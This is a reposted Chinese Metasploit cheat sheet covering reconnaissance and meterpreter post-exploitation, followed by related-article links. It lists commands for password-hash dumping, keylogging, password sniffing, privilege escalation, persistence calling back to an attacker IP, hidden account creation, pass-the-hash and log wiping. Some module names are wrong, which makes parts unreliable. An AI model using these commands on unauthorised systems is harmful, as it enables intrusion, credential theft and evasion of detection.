Metaspolit使用简介

最新推荐文章于 2024-07-03 12:10:57 发布
最新推荐文章于 2024-07-03 12:10:57 发布
阅读量1.4k 收藏 7
点赞数
文章标签: 运维 操作系统 shell
原文链接:http://www.cnblogs.com/KevinGeorge/p/9183122.html
版权

信息收集阶段

Whois信息收集

msf auxiliary > whois baidu.com

1070321-20180614151147110-115785854.png

域名信息查询阶段

msf auxiliary > nslookup www.baidu.com
msf auxiliary > dig @114.114.114.114 www.baidu.com

1070321-20180614151725180-11853868.png
1070321-20180614151742821-285104075.png

主机端口探测阶段

直接使用PING命令探测连通性
ping 1.2.3.4

msf > use auxiliary/scanner/discovery/arp_sweep
msf > set RHOSTS 1.1.1.0/24
msf > set THREADS 50
msf > run

使用NMAP探测
msf > nmap command

服务扫描打点

telnet服务:use auxiliary/scanner/telnet/telnet_version
ssh服务:use auxiliary/scanner/ssh/telnet_version
Oracle服务:use auxiliary/scanner/oracle/tnslsnr_version
http服务:use auxiliary/scanner/http/open_proxy

口令探测

ssh服务:use auxiliary/scanner/ssh/telnet_login
ftp服务:use auxiliary/sniffer/psnuffle

漏洞扫描阶段

那是nessus openVAS等的天下,可以利用PostgreSQL数据库进行联动

MSF框架下的WEB渗透

为什么不用burpsuite呢,用burpsuite更好
还有SQLMAP啊,还有好多其他的啊,啦啦啦

漏洞利用阶段

选择合适的漏洞利用payload和攻击脚本即可

use xxx
set payload xxx

强大的meterpreter

meterpreter > background 后台运行meterpreter
meterpreter > sessions 列出session,选择交互session的话 使用session -i  x
msterpreter > shell 
msterpreter > cat xxxxx 查看文件
msterpreter > getwd/getlwd  获取当下路径
msterpreter > upload xxx.exe c:\  上传文件或文件夹
msterpreter > download c:\\"Program Files"\\xxx\\xxx\\xxx  ./  下载文件
msterpreter > edit 使用vi编辑器编辑目标机上的文件
msterpreter > search 搜索目标上的文件
msterpreter > ipconfig 查看网络信息
msterpreter > portfwd add -l 1234 -p 3389 -r 1.2.3.4 将目标机的3389 转发到本地1234端口
msterpreter > route 查看目标机的路由信息
msterpreter > ps  查看进程表
msterpreter > migrate 转移shell到进程
msterpreter > execute -H -f cmd.exe 隐藏执行cmd
msterpreter > execute -H -i -f cmd.exe 可以与cmd交互了 -m 参数直接在内存执行供给端的可执行文件 execute -H -m -d xxx.exe -f xxx.exe -a "-o xxxx.txt" 
msterpreter > getpid 获取当前会话所在进程的pid
msterpreter > getuid /whoami 获取自己是谁
msterpreter > sysinfo  查看系统信息
msterpreter > kill 杀掉进程
msterpreter > shutdown关机
msterpreter > hashdump 获取windows 的hash口令
msterpreter > run persistence -X -i 5 -p 443 -r 192.168.10.141
msterpreter > run metsvc #吧31337端口打开监听meterpreter
msterpreter > run getgui -u metaspolit -p meterpreter 添加账户metaspolit 密码meterpreter
msterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up_xxxxxxxx.xxxx.rc
msterpreter > getsystem 提权
msterpreter > run post/windows/gather/dumplinks 获取最近处理的文档
msterpreter > run post/windows/gather/enum_applications 获取安装的程序
msterpreter > keyscan_start 键盘记录
msterpreter > keyscan_dump 
msterpreter > keyscan_stop 关闭
msterpreter > use sniffer #网络监听获取密码
msterpreter > sniffer_interface
msterpreter > sniffer_start 1
msterpreter > sniffer_dump 1 /tmp/xxx.pcap 
msterpreter > sniffer_stop 1
msterpreter > run post/windows/gather/enum_ie 浏览器获取密码
msterpreter > run windows/gather/smart_hashdump 获取系统口令
msterpreter > run get_local_subnets 添加路由 
msterpreter > background 后 route add a.b.c.d x.x.x.x 1 然后查看route print 
msf > use exploit/windows/smb/psexec
msf > set RHOST RPORT LHOST ...
msf > set SMBPass hash值
msf > exploit
msterpreter > clearev 删除日志
msterpreter >timestomp 停止修改文件属性的时间记录

转载于:https://www.cnblogs.com/KevinGeorge/p/9183122.html

weixin_30940783
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
48-2 内网渗透 - 利用Metasploit提权
weixin_43263566的博客
06-19 112
Metasploit是一个开源的安全漏洞检测工具,广泛用于安全和IT专业人士识别、验证和利用安全漏洞,同时也支持专家驱动的安全评估和管理。
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法)
保持微笑的博客
01-14 4866
Metasploit渗透测试(框架介绍、靶机安装、基本使用方法) 干货干货干货
metaspolit教程
weixin_33720078的博客
06-01 667
docker run --rm -it --net=host strm/metasploit msfconsole  
metasploit使用介绍
qq_57223070的博客
10-12 4858
一些个人见解,希望能够对你有所帮助!
Metasploits Git更新
dj1174232716的专栏
08-05 2310
一:git下载最新版& {, `, L9 a5 b- p9 D #cd /opt/metasploit/ root@bt:/opt/metasploit# #rm -rf msf36 L& h. ~- c. k0 _5 } root@bt:/opt/metasploit# git clone https://github.com/rapid7/metasploit-framework.git
网络安全之searchsploit的使用
qq_44005305的博客
02-23 611
searchsploit是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。)这是Offensive Security()赞助的一个项目。存储了大量的漏洞利用程序,可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作,目前是世界上公开收集漏洞最全的数据库,该仓库每天都会更新,exploit-db提供searchsploit利用files.csv进行搜索离线漏洞库文件的位置。
渗透教程1(kali,metaspolit).pdf
02-07
- **Metasploit**:一个用于开发、测试和使用漏洞利用代码的开源框架。 ### 2. Kali Linux基本操作 #### 2.1 配置IP地址 在进行渗透测试之前,通常需要配置目标机器或测试环境的IP地址,确保网络连接正常。可以...
Metasploit学习资料.zip
02-06
Metasploit是一款广泛使用的开源安全工具,主要用于渗透测试和漏洞评估。这个压缩包“Metasploit学习资料.zip”包含了多个关于Metasploit框架的资源,帮助用户深入理解和掌握这款强大的工具。其中包含了官方文档、...
metasploit-pro-trial-grabber:这是一个PHP命令行脚本,用于自动获取metasploit 14天专业试用版密钥
05-31
使用和来获取联系信息进行注册,都是假的和一次性的。 所有注册过程都是自动化的,所以现在享受吧!捐款如果您喜欢这个脚本,请给我买杯咖啡?捐赠者2014-07-23:匿名 - (~ 300TWD)环境Linux: :1.0.8 x86 视窗...
毒蛇:metasploit-framework图形界面图形化内网渗透工具
02-01
一、Metasploit-Framework简介 Metasploit-Framework是一个开源项目,由 Rapid7 维护,它包含了大量的漏洞利用模块、payloads(有效载荷)以及后渗透工具。这个框架允许安全专家和道德黑客模拟攻击,测试网络防御,...
metasploitable-linux VMware镜像
03-09
安全测试靶机虚拟镜像,仅做安全测试学习使用
Searchsploit漏洞利用搜索工具的介绍及使用
最新发布
Reset
07-03 897
kali自带的,Searchsploit会通过本地的Exploit-db查找软件漏洞信息。Exploit Database存储了大量的漏洞利用程序,是Offensive Security赞助的项目,目前是世界上公开收集漏洞最全的数据库,这个仓库每天都会更新。Exploit-DB是一个漏洞库,kali中保存了一个这个漏洞库的拷贝。
网络安全之searchsploit的使用
xnxqwzy的博客
12-26 1316
是一个用于Exploit-DB的命令行搜索工具,可以帮助我们查找渗透模块。)这是Offensive Security()赞助的一个项目。存储了大量的漏洞利用程序,可以帮助安全研究者和渗透测试工程师更好的进行安全测试工作,目前是世界上公开收集漏洞最全的数据库,该仓库每天都会更新,exploit-db提供searchsploit利用files.csv进行搜索离线漏洞库文件的位置。
vulnhub——BILLU: B0X
weixin_54431413的博客
05-31 400
第一个思路主要是来利用sql注入,文件上传和文件包含漏洞结合来拿到shell,之后利用内核漏洞提权 第二个思路主要是对目标靶机进行了完整的信息收集,拿到更多了信息,利用了文件下载漏洞,拿到了root的密码,直接利用ssh登录目标服务器
Metasploit使用教程
Kali与编程
03-23 1957
例如,payload/windows/meterpreter/reverse_tcp是一个Windows系统的Meterpreter反向Shell Payload,可以建立与攻击机的反向连接并提供完全的系统访问权限。Payload模块是Metasploit中最重要的模块之一,它用于实现对目标系统的控制。Metasploit支持多种不同的操作系统(Windows、Linux、MacOS等)和硬件平台(x86、ARM等),并提供了多种编程接口,包括Ruby API、Python API、Java API等。
CVE-2019-0708漏洞复现
weixin_44232532的博客
09-10 641
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 ...
whois应用详解
punklove的专栏
11-27 2359
<br />WHOIS<br />     简单来说,whois就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期等)。通过whois来实现对域名信息的查询。<br />WHOIS概览<br />一. WHOIS的概念<br />     1.1什么是“WHOIS”<br />     “WHOIS”是当前域名系统中不可或缺的一项信息服务。在使用域名进行Internet冲浪时,很多用户希望进一步了解域名、名字服务器的详细
Metasploit基础和命令的使用
w1304099880的博客
03-19 1324
Metasploit基础Metasploit是什么?渗透测试是干什么的?Metasploit基础命令 Metasploit是什么? Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个
SQL注入之DVWA平台测试mysql注入
weixin_34309435的博客
09-19 219
今天主要针对mysql常用注入语句进行测试。 测试环境与工具: 测试平台:DVWA,下载地址:http://down.51cto.com/data/875088,也可下载metaspolit-table2虚拟机,里面已经部署好了dvwa.。 渗透工具:burpsuite-1.4.07下载地址:http://down.51cto.com/data/875103     首先我们介绍下DVWA...
怎么使用metaspolit对我的服务的5060端口进行扫描,以防被黑客入侵,具体命令是什么
07-01
确保您只在合法的环境下使用Metasploit,并获得了所有必要的授权。 关于您的问题,Metasploit是一款强大的渗透测试工具,它可以用于评估系统和网络的安全性。要使用Metasploit对5060端口进行扫描,您可以按照以下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值